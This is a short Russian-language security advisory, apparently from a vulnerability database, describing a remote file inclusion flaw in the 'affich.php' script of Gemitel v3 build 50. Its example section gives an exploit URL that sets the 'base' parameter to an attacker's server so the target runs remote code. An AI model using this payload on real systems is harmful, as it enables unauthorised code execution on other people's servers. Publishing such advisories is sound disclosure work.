Уязвимость включения файла в 'affich.php' сценарии в Gemitel

Дата публикации:
18.04.2004
Всего просмотров:
1244
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Gemitel V 3 build 50

Описание: Уязвимость обнаружена в Gemitel. Удаленный пользователь может включить и выполнить произвольный код на целевой системе.

Пример/Эксплоит:

http://[vulnerable host]/[Gemitel folder]/html/affich.php?base=http://[your server]/

URL производителя: http://www.isesam.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление см. в источнике сообщения.

Ссылки: Include vulnerability in GEMITEL v 3.50

или введите имя

CAPTCHA